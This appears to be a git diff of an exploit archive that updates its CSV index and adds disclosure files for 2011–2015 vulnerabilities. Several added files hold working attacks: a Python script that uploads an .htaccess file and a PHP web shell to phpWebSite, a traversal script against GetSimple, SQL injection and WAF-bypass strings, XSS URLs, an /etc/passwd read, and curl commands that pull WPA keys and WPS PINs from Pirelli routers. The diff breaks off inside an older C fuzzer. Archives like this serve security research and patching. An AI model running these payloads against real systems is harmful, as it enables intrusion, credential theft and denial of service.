-35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler Remote Code Execution",2014-11-06,metasploit,bsd,remote,0 +35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler - Remote Code Execution",2014-11-06,metasploit,bsd,remote,0 35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",2014-11-06,metasploit,php,remote,80 @@ -31900,7 +31900,7 @@ id,file,description,date,author,platform,type,port 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0 -35413,platforms/php/webapps/35413.php,"WordPress <=4.0 Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80 +35413,platforms/php/webapps/35413.php,"WordPress <=4.0 - Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80 35414,platforms/php/webapps/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80 35415,platforms/php/webapps/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 @@ -32146,7 +32146,7 @@ id,file,description,date,author,platform,type,port 35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 Image File Handling HTML Injection Vulnerability",2011-04-25,"Alberto Ortega",php,webapps,0 35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13 b 'theme_dir' Parameter Cross-Site Scripting Vulnerability",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS Vulnerability",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 -35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 Local File Include and Arbitrary File Upload Vulnerabilities",2011-04-28,KedAns-Dz,php,webapps,0 +35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Include and Arbitrary File Upload Vulnerabilities",2011-04-28,KedAns-Dz,php,webapps,0 35681,platforms/linux/local/35681.txt,"OProfile 0.9.6 'opcontrol' Utility 'set_event()' Local Privilege Escalation Vulnerability",2011-04-29,"Stephane Chauveau",linux,local,0 35682,platforms/php/webapps/35682.txt,"Tine 2.0 'vbook.php' Cross Site Scripting Vulnerability",2011-04-30,"AutoSec Tools",php,webapps,0 35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 'axes_default.css' Cross Site Scripting Vulnerability",2011-05-02,"Patrick Webster",java,webapps,0 @@ -32166,8 +32166,25 @@ id,file,description,date,author,platform,type,port 35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 'example.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 'index.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 -35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 +35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0 35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80 35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0 +35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0 +35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0 +35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 'edit.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 +35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 'login.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 +35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-09,"AutoSec Tools",php,webapps,0 +35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 'index.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 +35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 'upload.php' Arbitrary File Upload Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 +35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 +35721,platforms/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",hardware,webapps,80 +35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 +35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 'tce_xml_user_results.php' Multiple SQL Injection Vulnerabilities",2011-05-01,"AutoSec Tools",php,webapps,0 +35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 'index.php' SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0 +35725,platforms/multiple/dos/35725.pl,"Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 +35726,platforms/php/webapps/35726.py,"GetSimple 3.0 'set' Parameter Local File Include Vulnerability",2011-05-07,"AutoSec Tools",php,webapps,0 +35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design 'filedown.php' Local File Disclosure Vulnerability",2011-05-09,KnocKout,php,webapps,0 +35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 +35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass Vulnerability",2011-05-09,@drk1wi,multiple,remote,0 diff --git a/platforms/asp/webapps/35728.txt b/platforms/asp/webapps/35728.txt new file mode 100755 index 000000000..bf33d7ee3 --- /dev/null +++ b/platforms/asp/webapps/35728.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/47772/info + +Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Keyfax Customer Response Management 3.2.2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/keyfax32/test/response.asp?co="style%3d"x:expression(alert(1))""%20"; + +http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20"; \ No newline at end of file diff --git a/platforms/hardware/webapps/35721.txt b/platforms/hardware/webapps/35721.txt new file mode 100755 index 000000000..53c55b50e --- /dev/null +++ b/platforms/hardware/webapps/35721.txt @@ -0,0 +1,128 @@ +- Title: + +CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure +HomeStation Movistar + +- Author: + +Eduardo Novella @enovella_ +ednolo[@]inf.upv[dot]es + +- Version: + +Tested on firmware version PDG_TEF_SP_4.06L.6 + + +- Shodan dork : + + "Dropbear 0.46 country:es" ( From now on it looks like not working on this way) + + +- Summary: + +HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any +IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information. + + +- The vulnerability and the way to exploit it: + + +$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_" + + +$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey" +var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD'; + +$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin" +var WscDevPin = '12820078'; + +$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey" +var sessionKey='1189641421'; + +$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3 + BSSID: + + DC:0B:1A:XX:XX:XX + + + + +# Rebooting the router remotely and provoking a Denial of Service +#----------------------------------------------------------------- +http://${IP_ADDRESS}/resetrouter.html + +We can observe at the source: + + + +http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123 + + +# All the information what we can fetch from. +#---------------------------------------------- +webs$ ls +adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html +adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html +adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html +adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html +algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html +APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html +atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html +backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html +berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html +berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html +berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html +certadd.html footer.html logo.html routeadd.html stylemain.css +certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html +certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html +certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html +cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html +cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html +cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html +cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html +cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html +colors.css hlppppoeconn.html natcfg2.html scripts util.js +config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html +css hlptstdns.html omcidownload.html seclogintro.html wancfg.html +ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html +defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html +dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html +diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html +diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html +diag.html images pppoe.html statsadslerr.html wlsecurity.html +diagipow.html index.html pradd.html statsadsl.html wlsetup.html +diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html +diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html +diagpppoa.html ippcfg.html pwrmngt.html statsatm.html + + + ++ Conclusion: + + This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network + or even worse being a member of a botnet without knowledge of it. + First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them. + + + ++ References: + +http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html + + + ++ Timeline: + +2013-04-xx Send email to Movistar and Pirelli +2015-01-05 Full disclosure diff --git a/platforms/multiple/dos/35725.pl b/platforms/multiple/dos/35725.pl new file mode 100755 index 000000000..5fa9f1189 --- /dev/null +++ b/platforms/multiple/dos/35725.pl @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/47766/info + +Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. + +An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users. + +Perl versions 5.10.x are vulnerable. + +jonathan () blackbox:~/test$ cat poc1.pl + #!/usr/bin/perl + $a = +getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792); + jonathan () blackbox:~/test$ perl poc1.pl + Segmentation fault (core dumped) + jonathan () blackbox:~/test$ + diff --git a/platforms/multiple/remote/35729.txt b/platforms/multiple/remote/35729.txt new file mode 100755 index 000000000..48fad3931 --- /dev/null +++ b/platforms/multiple/remote/35729.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/47780/info + +Imperva SecureSphere is prone to a security-bypass vulnerability. + +An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities. + +15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' \ No newline at end of file diff --git a/platforms/php/webapps/35713.txt b/platforms/php/webapps/35713.txt new file mode 100755 index 000000000..ea3e9630c --- /dev/null +++ b/platforms/php/webapps/35713.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47751/info + +FestOS is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. + +FestOS 2.3c is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/admin/includes/tiny_mce/plugins/tinybrowser/upload.php \ No newline at end of file diff --git a/platforms/php/webapps/35715.txt b/platforms/php/webapps/35715.txt new file mode 100755 index 000000000..4ec651444 --- /dev/null +++ b/platforms/php/webapps/35715.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47755/info + +encoder is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +encoder 0.4.10 is vulnerable; other versions may also be affected. + +http://www.example.com/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35716.html b/platforms/php/webapps/35716.html new file mode 100755 index 000000000..5f509b185 --- /dev/null +++ b/platforms/php/webapps/35716.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47756/info + +Ampache is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Ampache 3.5.4 is vulnerable; other versions may also be affected. + +
" />
\ No newline at end of file diff --git a/platforms/php/webapps/35717.txt b/platforms/php/webapps/35717.txt new file mode 100755 index 000000000..f0ac59b4b --- /dev/null +++ b/platforms/php/webapps/35717.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47757/info + +Exponent CMS is prone to a local file-include vulnerability and an arbitrary-file-upload vulnerability. + +An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information. + +Exponent CMS 2.0.0 beta 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/exponent/content_selector.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00§ion=&action= \ No newline at end of file diff --git a/platforms/php/webapps/35718.txt b/platforms/php/webapps/35718.txt new file mode 100755 index 000000000..35b72ce78 --- /dev/null +++ b/platforms/php/webapps/35718.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47758/info + +Gelsheet is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Gelsheet 1.02 is vulnerable; other versions may also be affected. + +http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35719.py b/platforms/php/webapps/35719.py new file mode 100755 index 000000000..dd8f3cbb9 --- /dev/null +++ b/platforms/php/webapps/35719.py @@ -0,0 +1,116 @@ +source: http://www.securityfocus.com/bid/47759/info + +phpWebSite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +phpWebSite 1.7.1 is vulnerable; other versions may also be affected. + +# ------------------------------------------------------------------------ +# Software................phpWebSite 1.7.1 +# Vulnerability...........Arbitrary Upload +# Threat Level............Very Critical (5/5) +# Download................http://phpwebsite.appstate.edu/ +# Discovery Date..........5/5/2011 +# Tested On...............Windows Vista + XAMPP +# ------------------------------------------------------------------------ +# Author..................AutoSec Tools +# Site....................http://www.autosectools.com/ +# Email...................John Leitch +# ------------------------------------------------------------------------ +# +# +# --Description-- +# +# An arbitrary upload vulnerability in phpWebSite 1.7.1 can be exploited +# to upload a PHP shell. +# +# +# --PoC-- + +import socket + +host = 'localhost' +path = '/phpwebsite_1_7_1' +shell_path = path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/.shell' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 223\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="NewFile"; filename=".htaccess"\r\n' + 'Content-Type: application/octet-stream\r\n' + '\r\n' + 'AddType application/x-httpd-php .shell\r\n' + '\r\n' + 'Action application/x-httpd-php "/php/php.exe"\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading .htaccess' + return + else: print '.htaccess uploaded' + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 163\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="NewFile"; filename=".shell"\r\n' + 'Content-Type: application/octet-stream\r\n' + '\r\n' + '\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + + print 'shell located at http://' + host + shell_path + +upload_shell() \ No newline at end of file diff --git a/platforms/php/webapps/35720.txt b/platforms/php/webapps/35720.txt new file mode 100755 index 000000000..fba3e3790 --- /dev/null +++ b/platforms/php/webapps/35720.txt @@ -0,0 +1,29 @@ +# Exploit Title: SQL Injection in Microweber CMS 0.95 +# Google Dork: N/A +# Date: 12/16/2014 +# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn) +# Vendor Homepage: Microweber (https://microweber.com/) +# Software Link: https://github.com/microweber/microweber +# Version: 0.95 +# Tested on: N/A +# CVE : CVE-2014-9464 + +::PROOF OF CONCEPT:: + +GET /shop/category:[SQL INJECTION HERE] HTTP/1.1 +Host: target.org +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://target/shop +Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275 +Connection: keep-alive + +::REFERENCE:: +- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html +- https://www.youtube.com/watch?v=SSE8Xj_-QaQ +- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464 + +::DISCLAIMER:: +THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. \ No newline at end of file diff --git a/platforms/php/webapps/35722.txt b/platforms/php/webapps/35722.txt new file mode 100755 index 000000000..f2ed96da1 --- /dev/null +++ b/platforms/php/webapps/35722.txt @@ -0,0 +1,72 @@ +Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0 +Advisory ID: SROEADV-2015-04 +Author: Steffen Rösemann +Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014) +Vendor URL: http://www.sefrengo.org/start/start.html +Vendor Status: fixed +CVE-ID: - + +========================== +Vulnerability Description: +========================== + +The Content Management System Sefrengo v.1.6.0 contains SQL-Injection +vulnerabilities in its administrative Backend. + +================== +Technical Details: +================== + +The administrative Backend of Sefrengo CMS contains a functionality to edit +folders which reside on the CMS. Its located here: + +http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0 + +The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker +could abuse this to send crafted URLs to the administrator via mail to +execute own SQL commands (e.g. create a second admin-account). + +Exploit-Example: + +http:// +{TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0 + +Another SQL-Injection vulnerability can be found in the administrative +backend, where the admin can manage installed plugins. The vulnerable +parameter is „idclient“ in the following URL: + +http://{TARGET}/backend/main.php?area=plug&idclient=1 + +Exploit-Example: + +http:// +{TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+ + +========= +Solution: +========= + +Update to the latest version + +==================== +Disclosure Timeline: +==================== +21-Dec-2014 –found the vulnerability +21-Dec-2014 - informed the developers +22-Dec-2014 - response by vendor +04-Jan-2015 – fix by vendor +04-Jan-2015 - release date of this security advisory +04-Jan-2015 - post on BugTraq / FullDisclosure + +======== +Credits: +======== + +Vulnerability found and advisory written by Steffen Rösemann. + +=========== +References: +=========== + +http://www.sefrengo.org/start/start.html +http://sroesemann.blogspot.de diff --git a/platforms/php/webapps/35723.txt b/platforms/php/webapps/35723.txt new file mode 100755 index 000000000..c12ff70f9 --- /dev/null +++ b/platforms/php/webapps/35723.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47762/info + +TCExam is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +TCExam 11.1.029 is vulnerable; other versions may also be affected. + +http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/35724.txt b/platforms/php/webapps/35724.txt new file mode 100755 index 000000000..31790f4fd --- /dev/null +++ b/platforms/php/webapps/35724.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47763/info + +EmbryoCore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +EmbryoCore 1.03 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-] \ No newline at end of file diff --git a/platforms/php/webapps/35726.py b/platforms/php/webapps/35726.py new file mode 100755 index 000000000..d1acfba6d --- /dev/null +++ b/platforms/php/webapps/35726.py @@ -0,0 +1,58 @@ +source: http://www.securityfocus.com/bid/47767/info + +GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +GetSimple 3.0 is vulnerable; other versions may also be affected. + +# ------------------------------------------------------------------------ +# Software................GetSimple 3.0 +# Vulnerability...........Local File Inclusion +# Threat Level............Critical (4/5) +# Download................http://get-simple.info/ +# Discovery Date..........5/4/2011 +# Tested On...............Windows Vista + XAMPP +# ------------------------------------------------------------------------ +# Author..................AutoSec Tools +# Site....................http://www.autosectools.com/ +# Email...................John Leitch +# ------------------------------------------------------------------------ +# +# +# --Description-- +# +# A local file inclusion vulnerability in GetSimple 3.0 can be exploited +# to include arbitrary files. +# +# +# --PoC-- + +import socket + +host = 'localhost' +path = '/getsimple_3.0' +trav_sequence = '..%2f' * 8 + 'windows%2fwin.ini' +port = 80 + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, port)) +s.settimeout(8) + +s.send('POST ' + path + '/index.php?set=' + trav_sequence + ' HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 0\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n') + +resp = s.recv(8192) + +print resp + diff --git a/platforms/php/webapps/35727.txt b/platforms/php/webapps/35727.txt new file mode 100755 index 000000000..68117fbdb --- /dev/null +++ b/platforms/php/webapps/35727.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/47770/info + +HOMEPIMA Design is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. + +Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. + +http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/windows/dos/3204.c b/platforms/windows/dos/3204.c index fde2f62f6..4484ac64b 100755 --- a/platforms/windows/dos/3204.c +++ b/platforms/windows/dos/3204.c @@ -1,179 +1,179 @@ -/* - Proof of concept exploit for ZDI - Citrix Metaframe spooler service vulnerability - Microsoft Windows - EnumPrinter() & EnumPrinterW() Fuzzer v0.1 - Author: Andres Tarasco Acuña - 